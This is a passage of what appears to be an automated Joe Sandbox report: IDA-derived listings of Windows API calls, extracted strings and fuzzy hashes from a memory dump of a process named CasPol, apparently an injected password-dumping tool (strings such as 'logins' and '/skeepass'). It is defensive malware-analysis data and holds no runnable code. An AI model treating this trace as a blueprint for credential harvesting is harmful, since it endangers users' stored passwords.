                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                    • String ID: logins$null
                                                                                                                                                                                    • API String ID: 2148543256-2163367763
                                                                                                                                                                                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
• Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
• Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9

APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
• ??2@YAPAXI@Z.MSVCRT ref: 0040859D
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
• memset.MSVCRT ref: 004085CF
• memset.MSVCRT ref: 004085F1
• memset.MSVCRT ref: 00408606
• strcmp.MSVCRT ref: 00408645
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
• _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
• memset.MSVCRT ref: 0040870E
• strcmp.MSVCRT ref: 0040876B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
• CloseHandle.KERNEL32(?), ref: 004087A6
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
• String ID: ---
• API String ID: 3437578500-2854292027
• Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
• Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
• Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
• Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9

APIs
• memset.MSVCRT ref: 0041087D
• memset.MSVCRT ref: 00410892
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
• SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
• SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
• GetModuleHandleW.KERNEL32(00000000), ref: 00410951
• LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
• GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
• LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
• GetSysColor.USER32(0000000F), ref: 00410999
• DeleteObject.GDI32(?), ref: 004109D0
• DeleteObject.GDI32(?), ref: 004109D6
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1010922700-0
• Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
• Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
• Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
• Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29

APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• free.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• free.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• free.MSVCRT ref: 00418716
• free.MSVCRT ref: 0041872A
• free.MSVCRT ref: 00418749
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID: |A
• API String ID: 3356672799-1717621600
• Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
• Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
• Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
• Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D

APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
• Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
• Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
• Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
• Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E

APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW,7570CFBC,?,00413396), ref: 004138ED
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2012295524-70141382
• Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
• Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
• Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
• Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 00413865
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
• Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D

APIs
• GetDC.USER32(00000000), ref: 004121FF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
• ReleaseDC.USER32(00000000,00000000), ref: 0041221F
• SetBkMode.GDI32(?,00000001), ref: 00412232
• SetTextColor.GDI32(?,00FF0000), ref: 00412240
• SelectObject.GDI32(?,?), ref: 00412251
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
• SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1700100422-0
                                                                                                                                                                                    • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                    • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                    • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                    • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 552707033-0
                                                                                                                                                                                    • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                    • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
                                                                                                                                                                                      • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                      • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                      • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                    • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                    • String ID: 4$h
                                                                                                                                                                                    • API String ID: 4066021378-1856150674
                                                                                                                                                                                    • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                    • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf
                                                                                                                                                                                    • String ID: %%0.%df
                                                                                                                                                                                    • API String ID: 3473751417-763548558
                                                                                                                                                                                    • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                    • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                    • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                    • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                    • API String ID: 2892645895-3554254475
                                                                                                                                                                                    • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                    • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                    • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                      • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                      • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                      • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                    • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                    • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                    • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                    • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                      • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                    • API String ID: 973020956-4135340389
                                                                                                                                                                                    • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                    • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                                                                                    • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                    • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                    • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                      • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                      • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                    • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                    • API String ID: 4173585201-1821301763
                                                                                                                                                                                    • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
